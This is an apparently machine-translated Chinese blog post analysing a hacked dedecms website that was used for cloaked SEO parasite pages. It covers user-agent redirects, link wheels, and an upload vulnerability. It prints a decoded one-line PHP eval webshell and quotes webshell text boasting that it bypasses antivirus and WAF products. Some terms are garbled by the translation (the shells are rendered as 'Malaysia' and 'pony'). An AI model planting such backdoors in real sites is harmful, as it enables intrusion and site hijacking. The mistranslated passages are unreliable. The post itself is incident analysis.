当我们的网站被入侵了,该如何解决?
当我们的网站被黑客攻击时我们应该怎么办?
一般来说,遇到这种情况,不要惊慌。 只需拿出手机拍摄视频并发布到抖音或朋友圈即可。
今天早上,一名学生在群里发了一张截图,称自己的网站被黑了,被人用来造出这样的文字。 我们来看看截图。
然后,在快照中点击进入相应的列表主页。 当我看到这个时,我知道为什么。 然后索要了一个ftp账号,开始了愉快的分析之旅。
我们先从搜索结果分析开始
首先我把问题恢复了,然后我就用域名去网站了。 首先我找到了被寄生的页面,发现数量不少,而且从今年六月初就已经存在了。
然后点进去发现真的跳转到了列表首页。 根据经验丰富的驾驶员的经验,只有两种技术可以达到这个原因。
js判断useragent进行跳转
PHP判断useragent进行跳转
以前还有一种方式,如果用户直接访问,会返回正常页面,但如果用户从搜索引擎点击进去,会返回修改后的页面。 那和现在的原理是一样的,只是方法不同。 目前来说,这是为了让用户更难发现问题,这可能会让新手感到困惑。
确定了问题之后,我们就开始分析。 由于普通用户无法访问它,所以我们来模拟一个搜索引擎蜘蛛。
开始使用大杀器
作为一个seoer,怎么可能没有一个随意切换浏览器UA的插件呢? 我这里用的是这个。
不过这个插件默认没有搜索引擎ua,所以需要手动添加。 我这里就不详细说了。
我通过UA插件切换了浏览器的UA,然后再次访问,终于正常了。 然后就是网页源码的分析。 (其实也可以直接查看百度快照的源码,我这样做主要是为了安装b)
好人,我对此一无所知。 而这显然是程序自动生成的页面,与原来正常页面的页眉不同。
这是普通内页的页眉。 显然,黑帽仍然使用HTML5,而普通页面仍然使用XHTML(HTML4.0过渡)。 黑帽依然紧跟新时代,采用最新技术。
然后浏览源码,没有发现异常的js内容或者文件。 所以可以确定问题是在php中完成的。
但当我查看源代码时,我发现了一些新的东西。 这也可能是寄生虫的特征。
这里有一个隐藏的方块。 看起来就像是一个表格。 它可能用于网络钓鱼和窃取用户信息。 但由于没有引用对应的css样式,所以看不到真实的样子。
然后我们也看到所有的链接都变成了这个程序生成的页面链接。 对于寄生病毒,它们通常制成链轮的形式。 而且页面会越来越多。
我们还可以看到有链接连接到车站外部,形成一个大链轮。
内容我就不说了。 此类内容是使用模板批量生成的。
我们再来看另一个非常有趣的。 这一点在之前的黑帽文章中也提到过。 就是当我们经常搜索一些灰色词的时候,我们会在里面看到一些著名网站的结果。 那么之前的猜测就是通过锚文本+301跳转进行的。 但我发现我想太多了。 它只是一个外部链接锚文本,类似于著名的“谷歌炸弹”。
HTML源码的分析到这里就结束了,从中我们可以学到很多东西。 接下来我们来分析一下PHP。 一般出现这个问题的原因是网站存在文件上传漏洞,而童鞋的网站是dedecms,所以这个就更加明显了。
还有一个原因肯定是PHP引起的,那就是你可以在源代码中看到PHP的错误信息。 所以,很明显是黑客的PHP与原来的PHP冲突造成的。
一般来说,文件上传漏洞主要集中在图文上传目录和模板目录。 那么我就开一个ftp账户,开始我快乐的分析之旅……
PHP分析
一般情况下,如果想知道黑客将PHP文件上传到哪里,可以直接查看文件夹和文件的最新更新时间。
不过因为网站上的文件夹太多,童鞋们连D盾都快速扫描了一下才找到。 我不知道结果,但我还在傻傻地寻找着。 结果发现他删了。
但我也想得到黑客的PHP文件。 稍后我们再分析一下源码。 黑客的文件上传路径如我所料,一个在plus/img目录下,另一个在templates目录下。
让我们看一下这些文件。
首先将入口文件st.php放在plus/img目录下。 这个猜测应该是pony文件,方便上传后续的pony。 我们看一下源码:
很困惑,你看不懂吗? 没关系,我们翻译一下吧。 事实上,黑客就喜欢做这些高调的事情。 其实无非就是简单的加密和解密。
然后经过一番挣扎,我恢复了代码。
其实就是一段base64加密,然后经过两次base64解密,就得到了原来的东西。
解密后,是一个post表单处理,会执行post表单提交的代码。
@eval($_POST"test"]);
因此,黑客可以通过这个表格将马来西亚提交过来。 然后是下一份马来西亚文件。
这是马来西亚的档案。 第19行的$str包含一长串加密字符,所以我就不截图了。 无论如何,它很长。 然后我们解密一下,看看稍后会是什么样子。
\\r 请勿使用非法用途 \\r
\\r
\\r\\r
\\r
\\r
过安全狗、云锁、阿里云、360、护卫神、D盾、百度云、各种杀软!\\r
\\r